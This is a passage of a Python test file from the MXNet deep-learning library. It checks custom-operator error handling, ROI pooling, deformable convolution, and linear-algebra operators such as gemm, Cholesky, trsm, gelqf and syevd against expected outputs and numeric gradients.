custom_add()
from multiprocessing import Process
p = Process(target=custom_add)
p.daemon = True
p.start()
p.join(5)
assert not p.is_alive() and p.exitcode == 0
def _build_dot_custom(fun_forward, name):
class Dot(mx.operator.CustomOp):
def __init__(self):
super(Dot, self).__init__()
def forward(self, is_train, req, in_data, out_data, aux):
fun_forward(in_data, out_data)
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
pass
@mx.operator.register(name)
class DotProp(mx.operator.CustomOpProp):
def __init__(self):
super(DotProp, self).__init__()
def list_arguments(self):
return ['a', 'b']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [(in_shape[0][0], in_shape[1][1])]
def create_operator(self, ctx, shapes, dtypes):
return Dot()
def test_custom_op_exc():
# test except handling
# see https://github.com/apache/incubator-mxnet/pull/14693
# 1. error in python code
def custom_exc1():
def f(in_data, out_data):
assert False
out_data[0][:] = mx.nd.dot(in_data[0], in_data[1])
_build_dot_custom(f, 'Dot1')
a = mx.nd.zeros((4, 1))
b = mx.nd.zeros((1, 4))
c = mx.nd.Custom(a, b, op_type='Dot1')
c.wait_to_read()
pytest.raises(MXNetError, custom_exc1)
# 2. error in pushing operator to engine
def custom_exc2():
def f(in_data, out_data):
out_data[0][:] = mx.nd.dot(in_data[0], in_data[1])
_build_dot_custom(f, 'Dot2')
a = mx.nd.zeros((4, 2))
b = mx.nd.zeros((1, 4))
# trigger error by invalid input shapes of operands
c = mx.nd.Custom(a, b, op_type='Dot2')
c.wait_to_read()
pytest.raises(MXNetError, custom_exc2)
# 3. error in real execution
if default_device().device_type == 'cpu':
def custom_exc3():
def f(in_data, out_data):
dot = mx.nd.dot(in_data[0], in_data[1])
# input to Cholesky factorization should be
# symmetric positive-definite, error will be
# triggered in op execution on cpu
out_data[0][:] = mx.nd.linalg.potrf(dot)
out_data[0].wait_to_read()
_build_dot_custom(f, 'Dot3')
a = mx.nd.zeros((2, 1))
b = mx.nd.zeros((1, 2))
c = mx.nd.Custom(a, b, op_type='Dot3')
c.wait_to_read()
pytest.raises(MXNetError, custom_exc3)
def custom_exc4():
def f(in_data, out_data):
dot = mx.nd.dot(in_data[0], in_data[1])
# input to Cholesky factorization should be
# symmetric positive-definite, error will be
# triggered in op execution on cpu
out_data[0][:] = mx.nd.linalg.potrf(dot)
_build_dot_custom(f, 'Dot4')
a = mx.nd.zeros((2, 1))
b = mx.nd.zeros((1, 2))
c = mx.nd.Custom(a, b, op_type='Dot4')
c.wait_to_read()
pytest.raises(MXNetError, custom_exc4)
def test_psroipooling():
for num_rois in [1, 2]:
for num_classes, num_group in itertools.product([2, 3], [2, 3]):
for image_height, image_width in itertools.product([168, 224], [168, 224]):
for grad_nodes in [['im_data']]:
spatial_scale = 0.0625
feat_height = np.int(image_height * spatial_scale)
feat_width = np.int(image_width * spatial_scale)
im_data = np.random.rand(1, num_classes*num_group*num_group, feat_height, feat_width)
rois_data = np.zeros([num_rois, 5])
rois_data[:, [1,3]] = np.sort(np.random.rand(num_rois, 2)*(image_width-1))
rois_data[:, [2,4]] = np.sort(np.random.rand(num_rois, 2)*(image_height-1))
im_data_var = mx.symbol.Variable(name="im_data")
rois_data_var = mx.symbol.Variable(name="rois_data")
op = mx.sym.contrib.PSROIPooling(data=im_data_var, rois=rois_data_var, spatial_scale=spatial_scale,
group_size=num_group, pooled_size=num_group,
output_dim=num_classes, name='test_op')
rtol, atol = 1e-2, 1e-3
check_numeric_gradient(op, [im_data, rois_data], rtol=rtol, atol=atol,
grad_nodes=grad_nodes)
def test_psroipooling_with_type():
arg_params = {
'psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# plain psroipooling
sym = mx.sym.contrib.PSROIPooling(spatial_scale=0.0625, output_dim=2, pooled_size=3, name='psroipool')
ctx_list = [{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float64, 'psroipool_rois': np.float64}},
{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float32, 'psroipool_rois': np.float32}},
{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float16, 'psroipool_rois': np.float16}},
]
check_consistency(sym, ctx_list, grad_req={'psroipool_data': 'write',
'psroipool_rois': 'null'}, arg_params=arg_params)
@pytest.mark.parametrize('num_batch', [1, 2])
@pytest.mark.parametrize('num_channel_data_deformable_group', itertools.product([4, 8], [1, 2]))
@pytest.mark.parametrize('input_height_width', itertools.product([5, 6], [5, 6]))
@pytest.mark.parametrize('dilate', [(1, 1), (2, 2)])
@pytest.mark.parametrize('grad_nodes', [['im_data'], ['offset_data'], ['weight']])
def test_deformable_convolution(num_batch, num_channel_data_deformable_group, input_height_width,
dilate, grad_nodes):
num_channel_data, num_deformable_group = num_channel_data_deformable_group
input_height, input_width = input_height_width
output_height = input_height
output_width = input_width
im_data = np.random.rand(num_batch, num_channel_data, input_height, input_width)
offset_data = \
np.random.rand(num_batch, num_deformable_group * 3 * 3 * 2, output_height, output_width)\
* 0.8 + 0.1
weight = np.random.normal(0, 0.001, (num_channel_data, num_channel_data, 3, 3))
bias = np.zeros(num_channel_data)
im_data_var = mx.symbol.Variable(name="im_data").as_np_ndarray()
offset_data_var = mx.symbol.Variable(name="offset_data").as_np_ndarray()
weight_var = mx.symbol.Variable(name="weight").as_np_ndarray()
bias_var = mx.symbol.Variable(name="bias").as_np_ndarray()
op = mx.sym.npx.deformable_convolution(name='test_op', data=im_data_var,
offset=offset_data_var,
weight=weight_var, bias=bias_var,
num_filter=num_channel_data, pad=dilate,
kernel=(3, 3), stride=(1, 1), dilate=dilate,
num_deformable_group=num_deformable_group)
if grad_nodes[0] == 'offset_data':
# wider tolerance needed for coordinate differential
rtol, atol = 1.0, 1e-2
else:
rtol, atol = 0.05, 1e-3
# By now we only have gpu implementation
if default_device().device_type == 'gpu':
check_numeric_gradient(op, [im_data, offset_data, weight, bias], rtol=rtol, atol=atol,
grad_nodes=grad_nodes, ctx=mx.gpu(0), numeric_eps=1.0/64)
def _validate_sample_location(input_rois, input_offset, spatial_scale, pooled_w, pooled_h, sample_per_part, part_size, output_dim, num_classes, trans_std, feat_h, feat_w):
num_rois = input_rois.shape[0]
output_offset = input_offset.copy()
# simulate deformable psroipooling forward function
for roi_idx in range(num_rois):
sub_rois = input_rois[roi_idx, :].astype(np.float32)
img_idx, x0, y0, x1, y1 = int(sub_rois[0]), sub_rois[1], sub_rois[2], sub_rois[3], sub_rois[4]
roi_start_w = round(x0) * spatial_scale - 0.5
roi_start_h = round(y0) * spatial_scale - 0.5
roi_end_w = round(x1 + 1) * spatial_scale - 0.5
roi_end_h = round(y1 + 1) * spatial_scale - 0.5
roi_w, roi_h = roi_end_w - roi_start_w, roi_end_h - roi_start_h
bin_size_w, bin_size_h = roi_w / pooled_w, roi_h / pooled_h
sub_bin_size_w, sub_bin_size_h = bin_size_w / sample_per_part, bin_size_h / sample_per_part
for c_top in range(output_dim):
channel_each_cls = output_dim / num_classes
class_id = int(c_top / channel_each_cls)
for ph in range(pooled_h):
for pw in range(pooled_w):
part_h = int(math.floor(float(ph) / pooled_h * part_size))
part_w = int(math.floor(float(pw) / pooled_w * part_size))
trans_x = input_offset[roi_idx, class_id * 2, part_h, part_w] * trans_std
trans_y = input_offset[roi_idx, class_id * 2 + 1, part_h, part_w] * trans_std
bin_h_start, bin_w_start = ph * bin_size_h + roi_start_h, pw * bin_size_w + roi_start_w
need_check = True
while need_check:
pass_check = True
for ih in range(sample_per_part):
for iw in range(sample_per_part):
h = bin_h_start + trans_y * roi_h + ih * sub_bin_size_h
w = bin_w_start + trans_x * roi_w + iw * sub_bin_size_w
if w < -0.5 or w > feat_w - 0.5 or h < -0.5 or h > feat_h - 0.5:
continue
w = min(max(w, 0.1), feat_w - 1.1)
h = min(max(h, 0.1), feat_h - 1.1)
# if the following condiiton holds, the sampling location is not differentiable
# therefore we need to re-do the sampling process
if h - math.floor(h) < 1e-3 or math.ceil(h) - h < 1e-3 or w - math.floor(w) < 1e-3 or math.ceil(w) - w < 1e-3:
trans_x, trans_y = random.random() * trans_std, random.random() * trans_std
pass_check = False
break
if not pass_check:
break
if pass_check:
output_offset[roi_idx, class_id * 2 + 1, part_h, part_w] = trans_y / trans_std
output_offset[roi_idx, class_id * 2, part_h, part_w] = trans_x / trans_std
need_check = False
return output_offset
@pytest.mark.skip(reason="Flaky test, tracked at https://github.com/apache/incubator-mxnet/issues/11713")
def test_deformable_psroipooling():
sample_per_part = 4
trans_std = 0.1
for num_rois in [1, 2]:
for num_classes, num_group in itertools.product([2, 3], [2, 3]):
for image_height, image_width in itertools.product([160, 224], [160, 224]):
for grad_nodes in [['im_data'], ['offset_data']]:
spatial_scale = 0.0625
stride = int(1 / spatial_scale)
feat_height = np.int(image_height * spatial_scale)
feat_width = np.int(image_width * spatial_scale)
im_data = np.random.rand(1, num_classes*num_group*num_group, feat_height, feat_width)
rois_data = np.zeros([num_rois, 5])
rois_data[:, [1,3]] = np.sort(np.random.rand(num_rois, 2)*(image_width-1 - 2 * stride)) + stride
rois_data[:, [2,4]] = np.sort(np.random.rand(num_rois, 2)*(image_height-1 - 2 * stride)) + stride
offset_data = np.random.rand(num_rois, 2*num_classes, num_group, num_group)
# at certain points, the bilinear interpolation function may be non-differentiable
# to avoid this, we check whether the input locates on the valid points
offset_data = _validate_sample_location(rois_data, offset_data, spatial_scale, num_group, num_group,
sample_per_part, num_group, num_classes, num_classes, trans_std, feat_height, feat_width)
im_data_var = mx.symbol.Variable(name="im_data")
rois_data_var = mx.symbol.Variable(name="rois_data")
offset_data_var = mx.symbol.Variable(name="offset_data")
op = mx.sym.contrib.DeformablePSROIPooling(data=im_data_var, rois=rois_data_var,
trans=offset_data_var, spatial_scale=spatial_scale,
sample_per_part=4, group_size=num_group,
pooled_size=num_group, output_dim=num_classes,
trans_std=0.1, no_trans=False, name='test_op')
rtol, atol = 1e-2, 1e-3
# By now we only have gpu implementation
if default_device().device_type == 'gpu':
check_numeric_gradient(op, [im_data, rois_data, offset_data], rtol=rtol, atol=atol,
grad_nodes=grad_nodes, ctx=mx.gpu(0))
def _gemm_test_helper(dtype, grad_check, rtol_fw = None, atol_fw = None,
rtol_bw = None, atol_bw = None, num_eps = None):
def np_random_data(shape, dtype=np.float32):
return np.random.uniform(low=-0.5,
high=0.5, size=shape).astype(dtype)
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
data3 = mx.symbol.Variable('data3')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
shape1 = (2, 3)
shape2 = (3, 2)
shape3 = (3, 3)
shape4 = (2, 2)
data_in1 = np_random_data(shape1, dtype)
data_in2 = np_random_data(shape2, dtype)
data_in3 = np_random_data(shape3, dtype)
data_in4 = np_random_data(shape4, dtype)
# Check all transpositions of gemm operator.
data_in1_t = np.transpose(data_in1)
data_in2_t = np.transpose(data_in2)
res_gemm = 4. * np.dot(data_in1, data_in2) + 7. * data_in4
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.)
check_fw(test_gemm, [data_in1, data_in2, data_in4], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2, data_in4])
res_gemm = 4. * np.dot(data_in1_t, data_in2_t) + 7. * data_in3
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_a=True, transpose_b=True)
check_fw(test_gemm, [data_in1, data_in2, data_in3], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2, data_in3])
res_gemm = 4. * np.dot(data_in1_t, data_in1) + 7. * data_in3
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_a=True)
check_fw(test_gemm, [data_in1, data_in1, data_in3], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1, data_in3])
res_gemm = 4. * np.dot(data_in1, data_in1_t) + 7. * data_in4
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_b=True)
check_fw(test_gemm, [data_in1, data_in1, data_in4], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1, data_in4])
# Check batch of gemm.
a = rep_3x(data_in1, 2, 3)
b = rep_3x(data_in2, 3, 2)
c = rep_3x(data_in4, 2, 2)
r = 4. * np.dot(data_in1, data_in2) + 7. * data_in4
r = rep_3x(r, 2, 2)
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.)
check_fw(test_gemm, [a, b, c], [r])
if grad_check == 1:
check_grad(test_gemm, [a, b, c])
# Check for different axis that describes matrix rows.
a2 = np.copy(np.swapaxes(a, 0, 2))
b2 = np.copy(np.swapaxes(b, 0, 2))
c2 = np.copy(np.swapaxes(c, 0, 2))
r2 = np.copy(np.swapaxes(r, 0, 2))
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7., axis = 0)
check_fw(test_gemm, [a2, b2, c2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2, c2])
a2 = np.copy(np.swapaxes(a, 1, 2))
b2 = np.copy(np.swapaxes(b, 1, 2))
c2 = np.copy(np.swapaxes(c, 1, 2))
r2 = np.copy(np.swapaxes(r, 1, 2))
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7., axis = -3)
check_fw(test_gemm, [a2, b2, c2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2, c2])
# Check gemm2 operator same way as gemm.
res_gemm = 4. * np.dot(data_in1, data_in2)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4.)
check_fw(test_gemm, [data_in1, data_in2], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2])
res_gemm = 4. * np.dot(data_in1_t, data_in2_t)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_a=True,
transpose_b=True)
check_fw(test_gemm, [data_in1, data_in2], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2])
res_gemm = 4. * np.dot(data_in1_t, data_in1)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_a=True)
check_fw(test_gemm, [data_in1, data_in1], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1])
res_gemm = 4. * np.dot(data_in1, data_in1_t)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_b=True)
check_fw(test_gemm, [data_in1, data_in1], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1])
# Check batch of gemm2.
a = rep_3x(data_in1, 2, 3)
b = rep_3x(data_in2, 3, 2)
r = rep_3x(4. * np.dot(data_in1, data_in2), 2, 2)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4.)
check_fw(test_gemm, [a, b], [r])
if grad_check == 1:
check_grad(test_gemm, [a, b])
a2 = np.copy(np.swapaxes(a, 0, 2))
b2 = np.copy(np.swapaxes(b, 0, 2))
r2 = np.copy(np.swapaxes(r, 0, 2))
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., axis = 0)
check_fw(test_gemm, [a2, b2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2])
a2 = np.copy(np.swapaxes(a, 1, 2))
b2 = np.copy(np.swapaxes(b, 1, 2))
r2 = np.copy(np.swapaxes(r, 1, 2))
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., axis = -3)
check_fw(test_gemm, [a2, b2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2])
# Test gemm separately from other la-operators.
def test_gemm():
_gemm_test_helper(np.float64, True)
with environment('MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION', '0'):
_gemm_test_helper(np.float32, True)
if default_device().device_type == 'gpu':
with environment('MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION', '1'):
_gemm_test_helper(np.float32, True)
# Helper functions for test_laop
def _make_symm_symbol(a, ndims):
assert ndims >= 2
tr_shape = list(range(ndims))
tr_shape[-1] = ndims-2
tr_shape[-2] = ndims-1
tr_shape = tuple(tr_shape)
return 0.5 * (a + mx.sym.transpose(a, axes=tr_shape))
def _make_triangle_symm(a, ndims, m, lower, dtype=np.float32):
assert ndims >= 2
# The last two dimensions must both be m
# Create mask for lower triangle and diagonal
index = mx.sym.arange(start=0, stop=m, step=1, dtype=np.int32)
lt_mask = mx.sym.one_hot(index, depth=m, dtype=dtype)
for j in range(1, m):
part1 = mx.sym.zeros(shape=(j, m), dtype=dtype)
index = mx.sym.arange(start=0, stop=m-j, step=1, dtype=np.int32)
part2 = mx.sym.one_hot(index, depth=m, dtype=dtype)
lt_mask = lt_mask + mx.sym.concat(*[part1, part2], dim=0)
if not lower:
lt_mask = mx.sym.reshape(lt_mask, shape=(m, m))
lt_mask = mx.sym.transpose(lt_mask, axes=(1, 0))
shp = tuple([1]*(ndims-2) + [m, m])
lt_mask = mx.sym.reshape(lt_mask, shape=shp)
return mx.sym.broadcast_mul(a, lt_mask)
# @ankkhedia: Getting rid of fixed seed as flakiness could not be reproduced
# tracked at https://github.com/apache/incubator-mxnet/issues/11718
@xfail_when_nonstandard_decimal_separator
def test_laop():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 2e-6
rtol_bw = 1e-5
atol_bw = 1e-5
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
def check_fw_grad(sym, location, expected):
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
if grad_check == 1:
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
matrix = np.array([[9., 3., -6., 12.],
[3., 26., -7., -11.],
[-6., -7., 9., 7.],
[12., -11., 7., 65.]])
trian = np.array([[3., 0., 0., 0.],
[1., 5., 0., 0.],
[-2., -1., 2., 0.],
[4., -3., 6., 2.]])
pow = np.array([[2., 1., 1., 1.],
[1., 4., 1., 1.],
[1., 1., 8., 1.],
[1., 1., 1., 16.]])
inv = np.array([[8.95/3., 0.05/3., 2.65, -2.5/3.],
[0.05/3., 0.05, 0.05, 0.],
[2.65, 0.05, 2.5, -0.75],
[-2.5/3., 0., -0.75, 0.25]])
ident = np.eye(4)
shape = (4, 4, 1, 1)
ones = mx.nd.ones(shape).asnumpy()
for lower in [True, False]:
upper = not lower
# Tests with trivial 1x1 matrices.
data_in = np.random.uniform(1, 10, shape)
# test potrf
# Note: Have to symmetrize input, for gradient test to work
res_potrf = np.sqrt(data_in)
test_potrf = mx.sym.linalg.potrf(data1, lower=lower)
check_fw_grad(test_potrf, [data_in], [res_potrf])
# test potri
res_potri = np.divide(ones, data_in * data_in)
test_potri = mx.sym.linalg.potri(data1, lower=lower)
check_fw_grad(test_potri, [data_in], [res_potri])
# test trsm
trian_in = data_in * 7.
test_trsm = mx.sym.linalg.trsm(data1, data2, alpha=7., lower=lower)
check_fw_grad(test_trsm, [trian_in, data_in], [ones])
# test trmm
trian_in = np.divide(ones, trian_in)
test_trmm = mx.sym.linalg.trmm(data1, data2, alpha=7., transpose=True,
rightside=True, lower=lower)
check_fw_grad(test_trmm, [trian_in, data_in], [ones])
# test sumlogdiag
res_sumlogdiag = np.reshape(np.log(data_in), (4, 4))
test_sumlogdiag = mx.sym.linalg.sumlogdiag(data1)
check_fw_grad(test_sumlogdiag, [data_in], [res_sumlogdiag])
# more elaborate example of Cholesky factorization
low_trian = trian
if upper:
trian = np.transpose(trian)
# test potrf
test_potrf = mx.sym.linalg.potrf(_make_symm_symbol(data1, ndims=4), lower=lower)
a = rep_3x(matrix, 4, 4)
r = rep_3x(trian, 4, 4)
check_fw_grad(test_potrf, [a], [r])
#test potri
data1_ltri = _make_triangle_symm(
data1, ndims=4, m=4, lower=lower, dtype=dtype)
test_potri = mx.sym.linalg.potri(data1_ltri, lower=lower)
a = rep_3x(trian, 4, 4)
r = rep_3x(inv, 4, 4)
check_fw_grad(test_potri, [a], [r])
# test trsm
test_trsm = mx.sym.linalg.trsm(data1_ltri, data2, alpha=7., transpose=upper, lower=lower)
b = rep_3x(matrix, 4, 4)
r = rep_3x(7. * np.transpose(low_trian), 4, 4)
check_fw_grad(test_trsm, [a, b], [r])
test_trsm2 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=-2., rightside=True, transpose=lower, lower=lower)
r = rep_3x(-2. * low_trian, 4, 4)
check_fw_grad(test_trsm2, [a, b], [r])
test_trsm3 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=0.5, transpose=lower, lower=lower)
b = rep_3x(np.transpose(low_trian), 4, 4)
r = rep_3x(0.5 * ident, 4, 4)
check_fw_grad(test_trsm3, [a, b], [r])
test_trsm4 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=-0.5, rightside=True, transpose=upper, lower=lower)
b = rep_3x(low_trian, 4, 4)
r = rep_3x(-0.5 * ident, 4, 4)
check_fw_grad(test_trsm4, [a, b], [r])
# test trmm
test_trmm = mx.sym.linalg.trmm(
data1_ltri, data2, alpha=7., transpose=True, rightside=True, lower=lower)
a = [a, rep_3x(matrix, 4, 4)]
r = rep_3x(7. * np.dot(matrix, trian.T), 4, 4)
check_fw_grad(test_trmm, a, [r])
test_trmm2 = mx.sym.linalg.trmm(data1_ltri, data2, alpha=-2., lower=lower)
r = rep_3x(-2. * np.dot(trian, matrix), 4, 4)
check_fw_grad(test_trmm2, a, [r])
test_trmm3 = mx.sym.linalg.trmm(data1_ltri, data2, rightside=True, lower=lower)
r = rep_3x(np.dot(matrix, trian), 4, 4)
check_fw_grad(test_trmm3, a, [r])
test_trmm4 = mx.sym.linalg.trmm(
data1_ltri, data2, alpha=1.2, transpose=True, lower=lower)
r = rep_3x(1.2 * np.dot(trian.T, matrix), 4, 4)
check_fw_grad(test_trmm4, a, [r])
# test sumlogdiag
r = np.reshape(np.tile(10. * np.log(np.array([2.])), 3), (3,))
check_fw_grad(test_sumlogdiag, [rep_3x(pow, 4, 4)], [r])
# Tests for operators linalg.syrk, linalg.gelqf
def _gelqf_combined_symbol(a):
q, l = mx.sym.linalg.gelqf(a)
q_qt = mx.sym.linalg.syrk(q, transpose=False, alpha=1., name='Q_times_Qt')
l_q = mx.sym.linalg.trmm(l, q, alpha=1., name='L_times_Q')
return mx.sym.Group([q_qt, l_q])
# NOTE: If we leave the unused output dangling, things break if dtype=np.float64. Namely, the
# backward gradient for the unused output is of dtype np.float32 then.
# ==> Very annoying!
def _gelqf_first_output(a):
q, l = mx.sym.linalg.gelqf(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(l), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(q, bogus_scal)
def _gelqf_second_output(a):
q, l = mx.sym.linalg.gelqf(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(q), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(l, bogus_scal)
def _syevd_combined_symbol(a):
u, lam = mx.sym.linalg.syevd(a)
u_ut = mx.sym.linalg.syrk(u, transpose=False, alpha=1., name='U_times_Ut')
lam_u = mx.sym.broadcast_mul(mx.sym.reshape(lam, shape=(-2, 1)), u)
ut_lam_u = mx.sym.linalg.gemm2(u, lam_u, alpha=1., transpose_a=True,
transpose_b=False, name='Ut_L_U')
return mx.sym.Group([u_ut, ut_lam_u])
def test_laop_2():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 1e-6
rtol_bw = 1e-5
atol_bw = 1e-6
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
# Tests for linalg.syrk
mnalpha_lst = [(2, 3, 1.), (5, 3, -2.), (1, 6, 5.), (3, 3, 0.5), (4, 1, 10.), (1, 1, 1.)]
for m, n, alpha in mnalpha_lst:
#print('syrk: m={}, n={}, alpha={}'.format(m, n, alpha))
data_in1 = np.random.uniform(1, 10, (m, n))
res_syrk1 = alpha * np.dot(data_in1, data_in1.T)
test_syrk1 = mx.sym.linalg.syrk(data1, transpose=False, alpha=alpha)
check_fw(test_syrk1, [data_in1], [res_syrk1])
if grad_check == 1:
check_grad(test_syrk1, [data_in1])
res_syrk2 = alpha * np.dot(data_in1.T, data_in1)
test_syrk2 = mx.sym.linalg.syrk(data1, transpose=True, alpha=alpha)
check_fw(test_syrk2, [data_in1], [res_syrk2])
if grad_check == 1:
check_grad(test_syrk2, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, m, n)
r1_batch = rep_3x(res_syrk1, m, m)
check_fw(test_syrk1, [a_batch], [r1_batch])
if grad_check == 1:
check_grad(test_syrk1, [a_batch])
r2_batch = rep_3x(res_syrk2, n, n)
check_fw(test_syrk2, [a_batch], [r2_batch])
if grad_check == 1:
check_grad(test_syrk2, [a_batch])
# Tests for linalg.gelqf
# Currently disabled on GPU as they need cuda8
# and MxNet builds use cuda 7.5
if not (default_device() == mx.cpu()):
return
test_gelqf2 = _gelqf_combined_symbol(data1) # Outputs (dot(Q, Q.T), dot(L, Q))
test_gelqf_q = _gelqf_first_output(data1) # Output Q (L is not dangling)
test_gelqf_l = _gelqf_second_output(data1) # Output L (Q is not dangling)
mn_lst = [(4, 4), (1, 1), (5, 20), (1, 10), (15, 50)]
for m, n in mn_lst:
#print('gelqf: m={}, n={}'.format(m, n))
data_in1 = np.random.normal(0., 10., (m, n))
res_eye = np.eye(m)
res_a = data_in1
check_fw(test_gelqf2, [data_in1], [res_eye, res_a])
if grad_check == 1:
# A => Q
check_grad(test_gelqf_q, [data_in1])
# A => L
check_grad(test_gelqf_l, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, m, n)
reye_batch = rep_3x(res_eye, m, m)
ra_batch = a_batch
check_fw(test_gelqf2, [a_batch], [reye_batch, ra_batch])
if grad_check == 1:
# A => Q
check_grad(test_gelqf_q, [a_batch])
# A => L
check_grad(test_gelqf_l, [a_batch])
# Tests for operator linalg.syevd
def _syevd_first_output(a):
u, lam = mx.sym.linalg.syevd(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(lam), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(u, bogus_scal)
def _syevd_second_output(a):
u, lam = mx.sym.linalg.syevd(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(u), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(lam, bogus_scal)
def _syevd_forward(a):
lam, ut = np.linalg.eig(a)
ind = np.argsort(lam)
lam = lam[ind]
u = ut[:, ind].T
for i in range(0, a.shape[0]):
_syevd_forw_eigvec_sign(u[i])
return u, lam
def _syevd_forw_eigvec_sign(v):
ind = np.argmax(np.abs(v))
if v[ind] < 0.:
v[:] = -v
def _syevd_backward(grad_u, grad_l, u, l):
n = l.size
assert grad_l.size == n
assert grad_u.shape == (n, n)
assert u.shape == (n, n)
temp = np.dot(grad_u, u.T)
temp2 = np.diag(grad_l)
for i in range(1, n):
for j in range(0, i):
denom = 2. * (l[i] - l[j])
elem = (temp[i, j] - temp[j, i])/denom
temp2[i, j] = elem
temp2[j, i] = elem
temp3 = np.dot(u.T, temp2)
return np.dot(temp3, u)
# Seed set because the test is not robust enough to operate on random data
@pytest.mark.seed(1896893923)
def test_laop_3():
# Currently disabled on GPU as syevd needs cuda8
# and MxNet builds use cuda 7.5
if not (default_device() == mx.cpu()):
return
dtype = np.float64
rtol_fw = 1e-6
atol_fw = 1e-6
num_eps = 1e-4
rtol_bw = 1e-2
atol_bw = 1e-2
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol_fw, atol=atol_fw, dtype=dtype)
# Tests for linalg.syevd
test_syevd2 = _syevd_combined_symbol(data1) # Outputs (U U^T, U^T (diag L) U)
data1_s2 = _make_symm_symbol(data1, ndims=2)
test_syevd_u_2 = _syevd_first_output(data1_s2)
test_syevd_l_2 = _syevd_second_output(data1_s2)
data1_s4 = _make_symm_symbol(data1, ndims=4)
test_syevd_u_4 = _syevd_first_output(data1_s4)
test_syevd_l_4 = _syevd_second_output(data1_s4)
n_lst = [4, 1, 2, 10, 14]
for n in n_lst:
#print('\n** syevd: n={}'.format(n))
